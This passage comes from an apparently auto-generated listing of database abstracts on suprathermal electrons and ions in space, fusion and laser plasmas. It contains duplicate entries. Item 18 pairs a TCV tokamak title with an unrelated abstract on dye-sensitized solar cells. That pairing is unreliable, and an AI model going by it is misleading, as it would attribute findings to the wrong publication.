drivers. The hotter sub-population temperature is strongly correlated with neutral density, while the cooler sub-population is unaffected by neutral density and is only weakly correlated with magnetic field strength. We suggest that the population with temperatures above 8.6 eV is being heated by lower hybrid waves driven by counterstreaming solar wind protons and newly formed, cometary ions created in localized, dense neutral streams. To the best of our knowledge, this represents the first observations of cometary electrons heated through wave-particle interactions. 5. Supra-thermal charged particle energies in a low pressure radio-frequency electrical discharge in air International Nuclear Information System (INIS) Littlefield, R.G. 1976-01-01 Velocity spectra of supra-thermal electrons escaping from a low-pressure radio-frequency discharge in air have been measured by a time-of-flight method of original design. In addition, the energy spectra of the supra-thermal electrons and positive ions escaping from the rf discharge have been measured by a retarding potential method. Various parameters affecting the energy of the supra-thermal charged particles are experimentally investigated. A model accounting for the supra-thermal charged particle energies is developed and is shown to be consistent with experimental observations 6. SUPRATHERMAL ELECTRON STRAHL WIDTHS IN THE PRESENCE OF NARROW-BAND WHISTLER WAVES IN THE SOLAR WIND Energy Technology Data Exchange (ETDEWEB) Kajdič, P. [Instituto de Geofísica, Universidad Nacional Autónoma de México, Mexico City (Mexico); Alexandrova, O.; Maksimovic, M.; Lacombe, C. [LESIA, Observatoire de Paris, PSL Research University, CNRS, UPMC UniversitéParis 06, Université Paris-Diderot, 5 Place Jules Janssen, F-92190 Meudon (France); Fazakerley, A. N., E-mail: [email protected] [Mullard Space Science Laboratory, University College London (United Kingdom) 2016-12-20 We perform the first statistical study of the effects of the interaction of suprathermal electrons with narrow-band whistler mode waves in the solar wind (SW). We show that this interaction does occur and that it is associated with enhanced widths of the so-called strahl component. The latter is directed along the interplanetary magnetic field away from the Sun. We do the study by comparing the strahl pitch angle widths in the SW at 1 AU in the absence of large scale discontinuities and transient structures, such as interplanetary shocks, interplanetary coronal mass ejections, stream interaction regions, etc. during times when the whistler mode waves were present and when they were absent. This is done by using the data from two Cluster instruments: Spatio Temporal Analysis of Field Fluctuations experiment (STAFF) data in the frequency range between ∼0.1 and ∼200 Hz were used for determining the wave properties and Plasma Electron And Current Experiment (PEACE) data sets at 12 central energies between ∼57 eV (equivalent to ∼10 typical electron thermal energies in the SW, E{sub T}) and ∼676 eV (∼113 E{sub T}) for pitch angle measurements. Statistical analysis shows that, during the intervals with the whistler waves, the strahl component on average exhibits pitch angle widths between 2° and 12° larger than during the intervals when these waves are not present. The largest difference is obtained for the electron central energy of ∼344 eV (∼57 ET). 7. SUPRATHERMAL ELECTRON STRAHL WIDTHS IN THE PRESENCE OF NARROW-BAND WHISTLER WAVES IN THE SOLAR WIND International Nuclear Information System (INIS) Kajdič, P.; Alexandrova, O.; Maksimovic, M.; Lacombe, C.; Fazakerley, A. N. 2016-01-01 We perform the first statistical study of the effects of the interaction of suprathermal electrons with narrow-band whistler mode waves in the solar wind (SW). We show that this interaction does occur and that it is associated with enhanced widths of the so-called strahl component. The latter is directed along the interplanetary magnetic field away from the Sun. We do the study by comparing the strahl pitch angle widths in the SW at 1 AU in the absence of large scale discontinuities and transient structures, such as interplanetary shocks, interplanetary coronal mass ejections, stream interaction regions, etc. during times when the whistler mode waves were present and when they were absent. This is done by using the data from two Cluster instruments: Spatio Temporal Analysis of Field Fluctuations experiment (STAFF) data in the frequency range between ∼0.1 and ∼200 Hz were used for determining the wave properties and Plasma Electron And Current Experiment (PEACE) data sets at 12 central energies between ∼57 eV (equivalent to ∼10 typical electron thermal energies in the SW, E T ) and ∼676 eV (∼113 E T ) for pitch angle measurements. Statistical analysis shows that, during the intervals with the whistler waves, the strahl component on average exhibits pitch angle widths between 2° and 12° larger than during the intervals when these waves are not present. The largest difference is obtained for the electron central energy of ∼344 eV (∼57 ET). 8. Suprathermal electron production in laser-irradiated Cu targets characterized by combined methods of x-ray imaging and spectroscopy Czech Academy of Sciences Publication Activity Database Renner, Oldřich; Šmíd, Michal; Batani, D.; Antonelli, L. 2016-01-01 Roč. 58, č. 7 (2016), 1-8, č. článku 075007. ISSN 0741-3335 R&D Projects: GA MŠk LQ1606; GA MŠk EF15_008/0000162; GA MŠk(CZ) LD14089 Grant - others:ELI Beamlines(XE) CZ.02.1.01/0.0/0.0/15_008/0000162 Institutional support: RVO:68378271 Keywords : laser- plasma interaction * inertial confinement fusion * suprathermal electron Subject RIV: BL - Plasma and Gas Discharge Physics Impact factor: 2.392, year: 2016 9. Effects of ionization and ion loss on dust ion- acoustic solitary waves in a collisional dusty plasma with suprathermal electrons Science.gov (United States) Tribeche, Mouloud; Mayout, Saliha 2016-07-01 The combined effects of ionization, ion loss and electron suprathermality on dust ion- acoustic solitary waves in a collisional dusty plasma are examined. Carrying out a small but finite amplitude analysis, a damped Korteweg- de Vries (dK-- dV) equation is derived. The damping term decreases with the increase of the spectral index and saturates for Maxwellian electrons. Choosing typical plasma parameters, the analytical approximate solution of the dK- dV equation is numerically analyzed. We first neglect the ionization and ion loss effects and account only for collisions to estimate the relative importance between these damping terms which can act concurrently. Interestingly, we found that as the suprathermal character of the electrons becomes important, the strength of the collisions related dissipation becomes more important and causes the DIA solitary wave amplitude to decay more rapidly. Moreover, the collisional damping may largely prevail over the ionization and ion loss related damping. The latter becomes more effective as the electrons evolve far away from their thermal equilibrium. Our results complement and provide new insights into previously published work on this problem. 10. New Measurements of Suprathermal Ions, Energetic Particles, and Cosmic Rays in the Outer Heliosphere from the New Horizons PEPSSI Instrument Science.gov (United States) Hill, M. E.; Kollmann, P.; McNutt, R. L., Jr.; Stern, A.; Weaver, H. A., Jr.; Young, L. A.; Olkin, C.; Spencer, J. R. 2017-12-01 During the period from January 2012 to December 2017 the New Horizons spacecraft traveled from 22 to 41 AU from the Sun, making nearly continuous interplanetary plasma and particle measurements utilizing the SWAP and PEPSSI instruments. We report on newly extended measurements from PEPSSI (Pluto Energetic Particle Spectrometer Science Investigation) that now bring together suprathermal particles above 2 keV/nuc (including interstellar pickup ions), energetic particles with H, He, and O composition from 30 keV to 1 MeV, and cosmic rays above 65 MeV (with effective count-rate-limited upper energy of 1 GeV). Such a wide energy range allows us to look at the solar wind structures passing over the spacecraft, the energetic particles that are often accelerated by these structures, and the suppression of cosmic rays resulting from the increased turbulence inhibiting cosmic ray transport to the spacecraft position (i.e., Forbush decreases). This broad perspective provides simultaneous, previously unattainable diagnostics of outer heliospheric particle dynamics and acceleration. Besides the benefit of being recent, in-ecliptic measurements, unlike the historic Voyager 1 and 2 spacecraft, these PEPSSI observations are also totally unique in the suprathermal range; in this region only PEPSSI can span the suprathermal range, detecting a population that is a linchpin to understanding the outer heliosphere. 11. Stereo ENA Imaging of the Ring Current and Multi-point Measurements of Suprathermal Particles and Magnetic Fields by TRIO-CINEMA Science.gov (United States) Lin, R. P.; Sample, J. G.; Immel, T. J.; Lee, D.; Horbury, T. S.; Jin, H.; SEON, J.; Wang, L.; Roelof, E. C.; Lee, E.; Parks, G. K.; Vo, H. 2012-12-01 The TRIO (Triplet Ionospheric Observatory) - CINEMA (Cubesat for Ions, Neutrals, Electrons, & Magnetic fields) mission consists of three identical 3-u cubesats to provide high sensitivity, high cadence, stereo measurements of Energetic Neutral Atoms (ENAs) from the Earth's ring current with ~1 keV FWHM energy resolution from ~4 to ~200 keV, as well as multi-point in situ measurements of magnetic fields and suprathermal electrons (~2 -200 keV) and ions (~ 4 -200 keV) in the auroral and ring current precipitation regions in low Earth orbit (LEO). A new Suprathermal Electron, Ion, Neutral (STEIN) instrument, using a 32-pixel silicon semiconductor detector with an electrostatic deflection system to separate ENAs from ions and from electrons below 30 keV, will sweep over most of the sky every 15 s as the spacecraft spins at 4 rpm. In addition, inboard and outboard (on an extendable 1m boom) miniature magnetoresistive sensor magnetometers will provide high cadence 3-axis magnetic field measurements. An S-band transmitter will be used to provide ~8 kbps orbit-average data downlink to the ~11m diameter antenna of the Berkeley Ground Station.The first CINEMA (funded by NSF) is scheduled for launch on August 14, 2012 into a 65 deg. inclination LEO. Two more identical CINEMAs are being developed by Kyung Hee University (KHU) in Korea under the World Class University (WCU) program, for launch in November 2012 into a Sun-synchronous LEO to form TRIO-CINEMA. A fourth CINEMA is being developed for a 2013 launch into LEO. This LEO constellation of nanosatellites will provide unique measurements highly complementary to NASA's RBSP and THEMIS missions. Furthermore, CINEMA's development of miniature particle and magnetic field sensors, and cubesat-size spinning spacecraft may be important for future constellation space missions. Initial results from the first CINEMA will be presented if available. 12. Electron velocity distribution function in a plasma with temperature gradient and in the presence of suprathermal electrons: application to incoherent-scatter plasma lines Directory of Open Access Journals (Sweden) P. Guio Full Text Available The plasma dispersion function and the reduced velocity distribution function are calculated numerically for any arbitrary velocity distribution function with cylindrical symmetry along the magnetic field. The electron velocity distribution is separated into two distributions representing the distribution of the ambient electrons and the suprathermal electrons. The velocity distribution function of the ambient electrons is modelled by a near-Maxwellian distribution function in presence of a temperature gradient and a potential electric field. The velocity distribution function of the suprathermal electrons is derived from a numerical model of the angular energy flux spectrum obtained by solving the transport equation of electrons. The numerical method used to calculate the plasma dispersion function and the reduced velocity distribution is described. The numerical code is used with simulated data to evaluate the Doppler frequency asymmetry between the up- and downshifted plasma lines of the incoherent-scatter plasma lines at different wave vectors. It is shown that the observed Doppler asymmetry is more dependent on deviation from the Maxwellian through the thermal part for high-frequency radars, while for low-frequency radars the Doppler asymmetry depends more on the presence of a suprathermal population. It is also seen that the full evaluation of the plasma dispersion function gives larger Doppler asymmetry than the heat flow approximation for Langmuir waves with phase velocity about three to six times the mean thermal velocity. For such waves the moment expansion of the dispersion function is not fully valid and the full calculation of the dispersion function is needed. Key words. Non-Maxwellian electron velocity distribution · Incoherent scatter plasma lines · EISCAT · Dielectric response function 13. Electron velocity distribution function in a plasma with temperature gradient and in the presence of suprathermal electrons: application to incoherent-scatter plasma lines Directory of Open Access Journals (Sweden) P. Guio 1998-10-01 Full Text Available The plasma dispersion function and the reduced velocity distribution function are calculated numerically for any arbitrary velocity distribution function with cylindrical symmetry along the magnetic field. The electron velocity distribution is separated into two distributions representing the distribution of the ambient electrons and the suprathermal electrons. The velocity distribution function of the ambient electrons is modelled by a near-Maxwellian distribution function in presence of a temperature gradient and a potential electric field. The velocity distribution function of the suprathermal electrons is derived from a numerical model of the angular energy flux spectrum obtained by solving the transport equation of electrons. The numerical method used to calculate the plasma dispersion function and the reduced velocity distribution is described. The numerical code is used with simulated data to evaluate the Doppler frequency asymmetry between the up- and downshifted plasma lines of the incoherent-scatter plasma lines at different wave vectors. It is shown that the observed Doppler asymmetry is more dependent on deviation from the Maxwellian through the thermal part for high-frequency radars, while for low-frequency radars the Doppler asymmetry depends more on the presence of a suprathermal population. It is also seen that the full evaluation of the plasma dispersion function gives larger Doppler asymmetry than the heat flow approximation for Langmuir waves with phase velocity about three to six times the mean thermal velocity. For such waves the moment expansion of the dispersion function is not fully valid and the full calculation of the dispersion function is needed.Key words. Non-Maxwellian electron velocity distribution · Incoherent scatter plasma lines · EISCAT · Dielectric response function 14. ITER Plasma at Electron Cyclotron Frequency Domain: Stimulated Raman Scattering off Gould-Trivelpiece Modes and Generation of Suprathermal Electrons and Energetic Ions Science.gov (United States) Stefan, V. Alexander 2011-04-01 Stimulated Raman scattering in the electron cyclotron frequency range of the X-Mode and O-Mode driver with the ITER plasma leads to the ``tail heating'' via the generation of suprathermal electrons and energetic ions. The scattering off Trivelpiece-Gould (T-G) modes is studied for the gyrotron frequency of 170GHz; X-Mode and O-Mode power of 24 MW CW; on-axis B-field of 10T. The synergy between the two-plasmon decay and Raman scattering is analyzed in reference to the bulk plasma heating. Supported in part by Nikola TESLA Labs, La Jolla, CA 15. Suprathermal-electron generation, transport, and deposition in CO2-laser-irradiated targets International Nuclear Information System (INIS) Hauer, A.; Goldman, R.; Kristal, R. 1982-01-01 Experiments on both axial and lateral energy transport and deposition in spherical targets are described. A variety of diagnostics have been used to measure hot-electron transport and deposition including bremsstrahlung and inner-shell radiation and soft x-ray temperature measurements. Self-generated electric and magnetic fields play an important role in the transport and deposition of the hot electrons. In some cases distinct patterns of surface deposition consistent with magnetic-field configurations have been observed 16. Studies of suprathermal electron loss in the magnetic ripple of Tore Supra International Nuclear Information System (INIS) Basiuk, V.; Lipa, M.; Martin, G.; Chantant, M.; Guilhem, D.; Imbeaux, F.; Mitteau, R.; Peysson, Y.; Surle, F. 2000-01-01 A new prototype of protection against fast electron trapped in the magnetic ripple was installed on Tore-Supra in 1998. It was designed to support the high flux of fast electron generated by lower hybrid in the CIEL project (up to 6 MW/m 2 ) during steady state experiments. So it is actively cooled and allows a direct measurement of the energy lost in the ripple. (author) 17. Study of suprathermal electron transport in solid or compressed matter for the fast-ignitor scheme International Nuclear Information System (INIS) Perez, F. 2010-01-01 The inertial confinement fusion (ICF) concept is widely studied nowadays. It consists in quickly compressing and heating a small spherical capsule filled with fuel, using extremely energetic lasers. Since approximately 15 years, the fast-ignition (FI) technique has been proposed to facilitate the fuel heating by adding a particle beam - electrons generated by an ultra-intense laser - at the exact moment when the capsule compression is at its maximum. This thesis constitutes an experimental study of these electron beams generated by picosecond-scale lasers. We present new results on the characteristics of these electrons after they are accelerated by the laser (energy, divergence, etc.) as well as their interaction with the matter they pass through. The experimental results are explained and reveal different aspects of these laser-accelerated fast electrons. Their analysis allowed for significant progress in understanding several mechanisms: how they are injected into solid matter, how to measure their divergence, and how they can be automatically collimated inside compressed matter. (author) [fr 18. Studies of suprathermal emission due to cyclotron-electronic heating of the tokamak TCV plasma International Nuclear Information System (INIS) Blanchard, P. 2002-07-01 Photo sensitization of wide band gap semiconductors is used in a wide range of application like silver halide photography and xerography. The development of a new type of solar cells, based on the sensitization of meso porous metal oxide films by panchromatic dyes, has triggered a lot of fundamental research on electron transfer dynamics. Upon excitation, the sensitizer transfers an electron in the conduction band of the semiconductor. Recombination of the charge separated state is prevented by the fast regeneration of the dye by an electron donor present in solution. Until recently, most of the work in this area has been focused on the competition between the recombination and the regeneration processes, which take place in the nanosecond to millisecond regime. With the development of solid-state femtosecond laser, the measurement of the dynamics of the first electron transfer step occurring in the solar cell has become possible . Electron injection from ruthenium(Il) poly pyridyl complexes into titanium dioxide has been found to occur with a poly exponential rate, with time constants ranging from 10 ps. In spite of the lately acquired capacity to measure the dynamics of these reactions, the physical meaning of this poly exponential kinetics and the factors that can influence this process are still poorly understood. In this work, the development of a new femtosecond pump-probe spectrometer, intended to monitor the ultrafast dynamics of electron injection, is presented. The study of this process requires an excellent temporal resolution and a large wavelength tunability to be able to excite a great variety of dyes and to probe the different products of the reaction. These specifications were met using the latest progress made in optical parametric amplification, which allowed the construction of a versatile experimental set-up. The interfacing by computer of the different devices used during the experiments increase the ease of use of the set-up. Transient 19. Mach probe interpretation in the presence of supra-thermal electrons Czech Academy of Sciences Publication Activity Database Fuchs, Vladimír; Gunn, J. P. 2007-01-01 Roč. 14, č. 3 (2007), 032501-1 ISSN 1070-664X R&D Projects: GA ČR GA202/04/0360 Institutional research plan: CEZ:AV0Z20430508 Keywords : Mach probes * supra -thermal electrons * quasi-neutral PIC codes Subject RIV: BL - Plasma and Gas Discharge Physics Impact factor: 2.325, year: 2007 20. Effects of ionization and ion loss on dust ion-acoustic solitary waves in a collisional dusty plasma with suprathermal electrons Energy Technology Data Exchange (ETDEWEB) Mayout, Saliha; Gougam, Leila Ait [Faculty of Physics, Theoretical Physics Laboratory, Plasma Physics Group, University of Bab-Ezzouar, USTHB, B.P. 32, El Alia, Algiers 16111 (Algeria); Tribeche, Mouloud, E-mail: [email protected], E-mail: [email protected] [Faculty of Physics, Theoretical Physics Laboratory, Plasma Physics Group, University of Bab-Ezzouar, USTHB, B.P. 32, El Alia, Algiers 16111 (Algeria); Algerian Academy of Sciences and Technologies, Algiers (Algeria) 2016-03-15 The combined effects of ionization, ion loss, and electron suprathermality on dust ion-acoustic solitary waves in a collisional dusty plasma are examined. Carrying out a small but finite amplitude analysis, a damped Korteweg-de Vries (dK–dV) equation is derived. The damping term decreases with the increase of the spectral index and saturates for Maxwellian electrons. Choosing typical plasma parameters, the analytical approximate solution of the dK-dV equation is numerically analyzed. We first neglect the ionization and ion loss effects and account only for collisions to estimate the relative importance between these damping terms which can act concurrently. Interestingly, we found that as the suprathermal character of the electrons becomes important, the strength of the collisions related dissipation becomes more important and causes the dust ion-acoustic solitary wave amplitude to decay more rapidly. Moreover, the collisional damping may largely prevail over the ionization and ion loss related damping. The latter becomes more effective as the electrons evolve far away from their thermal equilibrium. Our results complement and provide new insights into previously published work on this problem. 1. Effects of ionization and ion loss on dust ion-acoustic solitary waves in a collisional dusty plasma with suprathermal electrons International Nuclear Information System (INIS) Mayout, Saliha; Gougam, Leila Ait; Tribeche, Mouloud 2016-01-01 The combined effects of ionization, ion loss, and electron suprathermality on dust ion-acoustic solitary waves in a collisional dusty plasma are examined. Carrying out a small but finite amplitude analysis, a damped Korteweg-de Vries (dK–dV) equation is derived. The damping term decreases with the increase of the spectral index and saturates for Maxwellian electrons. Choosing typical plasma parameters, the analytical approximate solution of the dK-dV equation is numerically analyzed. We first neglect the ionization and ion loss effects and account only for collisions to estimate the relative importance between these damping terms which can act concurrently. Interestingly, we found that as the suprathermal character of the electrons becomes important, the strength of the collisions related dissipation becomes more important and causes the dust ion-acoustic solitary wave amplitude to decay more rapidly. Moreover, the collisional damping may largely prevail over the ionization and ion loss related damping. The latter becomes more effective as the electrons evolve far away from their thermal equilibrium. Our results complement and provide new insights into previously published work on this problem. 2. Suprathermal ion transport in turbulent magnetized plasmas International Nuclear Information System (INIS) Bovet, A. D. 2015-01-01 Suprathermal ions, which have an energy greater than the quasi-Maxwellian background plasma temperature, are present in many laboratory and astrophysical plasmas. In fusion devices, they are generated by the fusion reactions and auxiliary heating. Controlling their transport is essential for the success of future fusion devices that could provide a clean, safe and abundant source of electric power to our society. In space, suprathermal ions include energetic solar particles and cosmic rays. The understanding of the acceleration and transport mechanisms of these particles is still incomplete. Basic plasma devices allow detailed measurements that are not accessible in astrophysical and fusion plasmas, due to the difficulty to access the former and the high temperatures of the latter. The basic toroidal device TORPEX offers an easy access for diagnostics, well characterized plasma scenarios and validated numerical simulations of its turbulence dynamics, making it the ideal platform for the investigation of suprathermal ion transport. This Thesis presents three-dimensional measurements of a suprathermal ion beam injected in turbulent TORPEX plasmas. The combination of uniquely resolved measurements and first principle numerical simulations reveals the general non-diffusive nature of the suprathermal ion transport. A precise characterization of their transport regime shows that, depending on their energies, suprathermal ions can experience either a super diffusive transport or a subdiffusive transport in the same background turbulence. The transport character is determined by the interaction of the suprathermal ion orbits with the turbulent plasma structures, which in turn depends on the ratio between the ion energy and the background plasma temperature. Time-resolved measurements reveal a clear difference in the intermittency of suprathermal ions time-traces depending on the transport regime they experience. Conditionally averaged measurements uncover the influence of 3. Electron cyclotron emission measurements during 28 GHz electron cyclotron resonance heating in Wendelstein WVII-A stellarator International Nuclear Information System (INIS) Hartfuss, H.J.; Gasparino, U.; Tutter, M.; Brakel, R.; Cattanei, G.; Dorst, D.; Elsner, A.; Engelhardt, K.; Erckmann, V.; Grieger, G.; Grigull, P.; Hacker, H.; Jaeckel, H.; Jaenicke, R.; Junker, J.; Kick, M.; Kroiss, H.; Kuehner, G.; Maassberg, H.; Mahn, C.; Mueller, G.; Ohlendorf, W.; Rau, F.; Renner, H.; Ringler, H.; Sardei, F.; Weller, A.; Wobig, H.; Wuersching, E.; Zippe, M.; Kasparek, W.; Mueller, G.A.; Raeuchle, E.; Schueller, P.G.; Schwoerer, K.; Thumm, M. 1987-11-01 Electron cyclotron emission measurements have been carried out on electron cyclotron resonance heated plasmas in the WENDELSTEIN VII-A Stellarator. Blackbody radiation from the thermalized plasma main body as well as radiation from a small amount of weakly relativistic suprathermal electrons has been detected. In addition sideband emission has been observed near the second harmonic of the heating line source. Harmonic generation and parametric wave decay at the upper hybrid layer may be a reasonable explanation. (orig.) 4. Suprathermal viscosity of dense matter International Nuclear Information System (INIS) Alford, Mark; Mahmoodifar, Simin; Schwenzer, Kai 2010-01-01 Motivated by the existence of unstable modes of compact stars that eventually grow large, we study the bulk viscosity of dense matter, taking into account non-linear effects arising in the large amplitude regime, where the deviation μ Δ of the chemical potentials from chemical equilibrium fulfills μ Δ > or approx. T. We find that this supra-thermal bulk viscosity can provide a potential mechanism for saturating unstable modes in compact stars since the viscosity is strongly enhanced. Our study confirms previous results on strange quark matter and shows that the suprathermal enhancement is even stronger in the case of hadronic matter. We also comment on the competition of different weak channels and the presence of suprathermal effects in various color superconducting phases of dense quark matter. 5. MAVEN SupraThermal and Thermal Ion Compostion (STATIC) Instrument Science.gov (United States) McFadden, J. P.; Kortmann, O.; Curtis, D.; Dalton, G.; Johnson, G.; Abiad, R.; Sterling, R.; Hatch, K.; Berg, P.; Tiu, C.; Gordon, D.; Heavner, S.; Robinson, M.; Marckwordt, M.; Lin, R.; Jakosky, B. 2015-12-01 The MAVEN SupraThermal And Thermal Ion Compostion (STATIC) instrument is designed to measure the ion composition and distribution function of the cold Martian ionosphere, the heated suprathermal tail of this plasma in the upper ionosphere, and the pickup ions accelerated by solar wind electric fields. STATIC operates over an energy range of 0.1 eV up to 30 keV, with a base time resolution of 4 seconds. The instrument consists of a toroidal "top hat" electrostatic analyzer with a 360° × 90° field-of-view, combined with a time-of-flight (TOF) velocity analyzer with 22.5° resolution in the detection plane. The TOF combines a -15 kV acceleration voltage with ultra-thin carbon foils to resolve H+, He^{++}, He+, O+, O2+, and CO2+ ions. Secondary electrons from carbon foils are detected by microchannel plate detectors and binned into a variety of data products with varying energy, mass, angle, and time resolution. To prevent detector saturation when measuring cold ram ions at periapsis (˜10^{1 1} eV/cm2 s sr eV), while maintaining adequate sensitivity to resolve tenuous pickup ions at apoapsis (˜103 eV/cm2 s sr eV), the sensor includes both mechanical and electrostatic attenuators that increase the dynamic range by a factor of 103. This paper describes the instrument hardware, including several innovative improvements over previous TOF sensors, the ground calibrations of the sensor, the data products generated by the experiment, and some early measurements during cruise phase to Mars. 6. Electricity electron measurement International Nuclear Information System (INIS) Kim, Sang Jin; Sung, Rak Jin 1985-11-01 This book deals with measurement of electricity and electron. It is divided into fourteen chapters, which depicts basic of electricity measurement, unit and standard, important electron circuit for measurement, instrument of electricity, impedance measurement, power and power amount measurement, frequency and time measurement, waveform measurement, record instrument and direct viewing instrument, super high frequency measurement, digital measurement on analog-digital convert, magnetic measurement on classification by principle of measurement, measurement of electricity application with principle sensors and systematization of measurement. 7. Heating and generation of suprathermal particles at collisionless shocks International Nuclear Information System (INIS) Thomsen, M.F. 1985-01-01 Collisionless plasma shocks are different from ordinary collisional fluid shocks in several important respects. They do not in general heat the electrons and ions equally, nor do they produce Maxwellian velocity distributions downstream. Furthermore, they commonly generate suprathermal particles which propagate into the upstream region, giving advance warning of the presence of the shock and providing a ''seed'' population for further acceleration to high energies. Recent space observations and theory have revealed a great deal about the heating mechanisms which occur in collisionless shocks and about the origin of the various suprathermal particle populations which are found in association with them. An overview of the present understanding of these subjects is presented herein. 83 refs., 8 figs 8. Time Variations of the Spectral Indices of the Suprathermal Distribution as observed by WIND/STICS Science.gov (United States) Gruesbeck, J. R.; Christian, E. R.; Lepri, S. T.; Thomas, J.; Zurbuchen, T.; Gloeckler, G. 2011-12-01 Suprathermal particle spectra, measured in various regions of the heliosphere and heliosheath by Ulysses, ACE and Voyager, have recently been reported. In many cases long accumulation times had to be used to obtain sufficient statistical accuracy, and corrections were necessary, since only a fraction of phase space was measured. The SupraThermal Ion Composition Spectrometer (STICS), onboard Wind, enables observations of the suprathermal plasma in the solar wind at much higher time resolution. In addition, the STICS samples nearly full three-dimensional phase space, enabling measurements of anisotropies. We present a multi-year investigation of the spectral index of the suprathermal distribution, accumulated over 1 day and less, where we see significant time variation. An average lower bound value of the spectral index is at ~ -5, however, there are time periods during which the observed distributions steepen. We will also present an analysis of time and spatial variations of the suprathermal particle fluxes, observed by STICS and other instruments. In particular, we will compare the observed variability with predictions from a model by Bochsler and Moebius, based on data of the Interstellar Boundary Explorer (IBEX), who postulated that energetic neutral atoms, from outside of the heliosheath, which then penetrate the inner heliosphere and are finally ionized, could be a source of the very suprathermal populations we observe. 9. Electron density interferometry measurement in laser-matter interaction International Nuclear Information System (INIS) Popovics-Chenais, C. 1981-05-01 This work is concerned with the laser-interferometry measurement of the electronic density in the corona and the conduction zone external part. Particularly, it is aimed at showing up density gradients and at their space-time localization. The first chapter recalls the density profile influence on the absorption principal mechanisms and the laser energy transport. In chapter two, the numerical and analytical hydrodynamic models describing the density profile are analysed. The influence on the density profile of the ponderomotive force associated to high oscillating electric fields is studied, together with the limited thermal conduction and suprathermal electron population. The mechanism action, in our measurement conditions, is numerically simulated. Calculations are made with experimental parameters. The measurement interaction conditions, together with the diagnostic method by high resolution laser interferometry are detailed. The results are analysed with the help of numerical simulation which is the experiment modeling. An overview of the mechanisms shown up by interferometric measurements and their correlation with other diagnostics is the conclusion of this work [fr 10. Electron distribution functions in Io plasma torus International Nuclear Information System (INIS) Boev, A.G. 2003-01-01 Electron distribution functions measured by the Voyager 1 in different shares of the Io plasma torus are explained. It is proved that their suprathermal tails are formed by the electrical field induced by the 'Jupiter wind'. The Maxwellian parts of all these spectra characterize thermal equilibrium populations of electrons and the radiation of exited ions 11. Suprathermal protons in the interplanetary solar wind Science.gov (United States) Goodrich, C. C.; Lazarus, A. J. 1976-01-01 Using the Mariner 5 solar wind plasma and magnetic field data, we present observations of field-aligned suprathermal proton velocity distributions having pronounced high-energy shoulders. These observations, similar to the interpenetrating stream observations of Feldman et al. (1974), are clear evidence that such proton distributions are interplanetary rather than bow shock associated phenomena. Large Alfven speed is found to be a requirement for the occurrence of suprathermal proton distribution; further, we find the proportion of particles in the shoulder to be limited by the magnitude of the Alfven speed. It is suggested that this last result could indicate that the proton thermal anisotropy is limited at times by wave-particle interactions 12. Suprathermal grains: on intergalactic magnetic fields International Nuclear Information System (INIS) Dasgupta, A.K. 1979-01-01 Charged dust grains of radii a approximately equal to 3 x 10 -6 to approximately 3 x 10 -5 cm may be driven out of the galaxy due to radiation pressure of starlight. Once clear of the main gas-dust layer, dust grains may then escape into intergalactic space. Such grains are virtually indestructible-being evaporated only during formation. The dust grains, once injected into the intergalactic medium, may acquire suprathermal energy, thus 'suprathermal grains' in collision with magnetized cloud by the Fermi process. In order to attain relativistic energy, suprathermal grains have to move in and out ('scattering') of the magnetic field of the medium. It is now well established that high energy cosmic rays are of the order 10 20 eV or more. It has been speculated that these high energy (> = 10 18 eV) cosmic ray particles are charged dust grains, of intergalactic origin. This is possible only if there exists a magnetic field in the intergalactic medium. (Auth.) 13. A Supra-Thermal Energetic Particle detector (STEP) for composition measurements in the range approximately 20 keV/nucleon to 1 MeV/nucleon Science.gov (United States) Mason, G. M.; Gloeckler, G. 1981-01-01 A detector system is described, employing a time-of-flight versus residual energy technique which allows measurement of particle composition (H-Fe), energy spectral and anisotropies in an energy range unaccessible with previously flown sensors. Applications of this method to measurements of the solar wind ion composition are discussed. 14. A supra-thermal energetic particle detector /STEP/ for composition measurements in the range of about 20 keV/nucleon to 1 MeV/nucleon Science.gov (United States) Mason, G. M.; Gloeckler, G. 1981-01-01 A novel detector system is described, employing a time-of-flight versus residual energy technique which allows measurement of particle composition (H-Fe), energy spectra and anisotropies in an energy range unaccessible with previously flown sensors. Applications of this method to measurements of the solar wind ion composition are also discussed. 15. Electronic Warfare Signature Measurement Facility Data.gov (United States) Federal Laboratory Consortium — The Electronic Warfare Signature Measurement Facility contains specialized mobile spectral, radiometric, and imaging measurement systems to characterize ultraviolet,... 16. Ripple enhanced transport of suprathermal alpha particles International Nuclear Information System (INIS) Tani, K.; Takizuka, T.; Azumi, M. 1986-01-01 The ripple enhanced transport of suprathermal alpha particles has been studied by the newly developed Monte-Carlo code in which the motion of banana orbit in a toroidal field ripple is described by a mapping method. The existence of ripple-resonance diffusion has been confirmed numerically. We have developed another new code in which the radial displacement of banana orbit is given by the diffusion coefficients from the mapping code or the orbit following Monte-Carlo code. The ripple loss of α particles during slowing down has been estimated by the mapping model code as well as the diffusion model code. From the comparison of the results with those from the orbit-following Monte-Carlo code, it has been found that all of them agree very well. (author) 17. Suprathermal He2+ in the Earth's foreshock region International Nuclear Information System (INIS) Fuselier, S.A.; Thomsen, M.F.; Ipavich, F.M.; Schmidt, W.K.H. 1995-01-01 ISEE 1 and 2 H + and He 2+ observations upstream from the Earth's bow shock are used to investigate the origin of energetic (or diffuse) ion distributions. Diffuse ion distributions have energies from a few keV/e to > 100 keV/e and have near solar wind concentrations (i.e., an average of about 4% He 2+ ). These distributions may evolve from suprathermal ion distributions that have energies between 1 and a few keV/e. Upstream intervals were selected from the ISEE data to determine which suprathermal distributions have He 2+ concentrations similar to those of diffuse ion distributions. The type of distribution and the location in the foreshock were similar in all events studied. Two intervals that represent the results from this study are discussed in detail. The results suggest that diffuse ion distributions evolve from suprathermal distributions in the region upstream from the quasi-parallel bow shock. For He 2+ , the suprathermal distribution is a nongyrotropic partial ring beam and has characteristics consistent with specular reflection off the quasi-parallel bow shock. The suprathermal proton distributions associated with these He 2+ distributions are nongyrotropic partial ring beams or nearly gyrotropic ring beams also approximately consistent with specular reflection. The location in the quasi-parallel foreshock and the similarity of the suprathermal He 2+ and H + distributions suggest that these are the seed population for diffuse distributions in the foreshock region. 30 refs., 5 figs., 1 tab 18. Discovery of Suprathermal Fe+ in and near Earth's Magnetosphere Science.gov (United States) Christon, S. P.; Hamilton, D. C.; Plane, J. M. C.; Mitchell, D. G.; Grebowsky, J. M.; Spjeldvik, W. N.; Nylund, S. R. 2017-12-01 Suprathermal (87-212 keV/e) singly charged iron, Fe+, has been observed in and near Earth's equatorial magnetosphere using long-term ( 21 years) Geotail/STICS ion composition data. Fe+ is rare compared to dominant suprathermal solar wind and ionospheric origin heavy ions. Earth's suprathermal Fe+ appears to be positively associated with both geomagnetic and solar activity. 